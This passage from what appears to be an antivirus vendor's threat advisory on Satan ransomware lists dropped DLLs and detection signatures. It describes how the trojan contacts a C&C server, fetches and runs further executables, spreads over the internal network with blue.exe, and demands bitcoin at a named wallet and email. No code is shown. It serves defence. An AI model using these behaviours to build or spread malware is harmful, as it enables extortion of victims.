  • %ALLUSERSPROFILE%\tucl-1.dll [Detected as GAV: Shadowbrokers.DZ (Trojan)]
  • %ALLUSERSPROFILE%\trfo-2.dll [Detected as GAV: Downloader.A_1169 (Trojan)]
  • %ALLUSERSPROFILE%\tucl-1.dll [Detected as GAV: MalAgent.J_21729 (Trojan)]
  • %ALLUSERSPROFILE%\ucl.dll
  • %ALLUSERSPROFILE%\xdvl-0.dll [Detected as GAV: Eqtonex.A_2 (Trojan)]
  • %ALLUSERSPROFILE%\zlib1.dll [Detected as GAV: MalAgent.J_35104 (Trojan)]

The Trojan reports the infection to a C&C server:

The Trojan downloads and runs ms.exe and setup.exe from the C&C server:

We observed the trojan running blue.exe with its commandline arguments. This is an attempt to spread to other machines on the internal network:

Some configuration strings can be seen in the trojans memory after being unpacked:

The Trojan instructs victims to send 0.3 BTC to 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo. It seems that some have fallen prey to its scheme:

We reached out to satan_pro@mail.ru concerning file decryption but did not receive a response.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Satan.RSM (Trojan)
  • GAV: SatanCryptor.RSM_2 (Trojan)
  • GAV: Suspicious#mpress.2 (Trojan)
  • GAV: Squida.A_2 (Trojan)
  • GAV: MalAgent.J_39290 (Trojan)
  • GAV: Downloader.A_1172 (Trojan)
  • GAV: MalAgent.J_29735 (Trojan)
  • GAV: Artemis.A_162 (Trojan)
  • GAV: Shadowbrokers.D_5 (Trojan)
  • GAV: MalAgent.J_21737 (Trojan)
  • GAV: Eqtonex.A_6 (Trojan)
  • GAV: MalAgent.J_8604 (Trojan)
  • GAV: MalAgent.H_9335 (Trojan)
  • GAV: Shadowbrokers.DZ (Trojan)
  • GAV: Downloader.A_1169 (Trojan)
  • GAV: MalAgent.J_21729 (Trojan)
  • GAV: Eqtonex.A_2 (Trojan)
  • GAV: MalAgent.J_35104 (Trojan)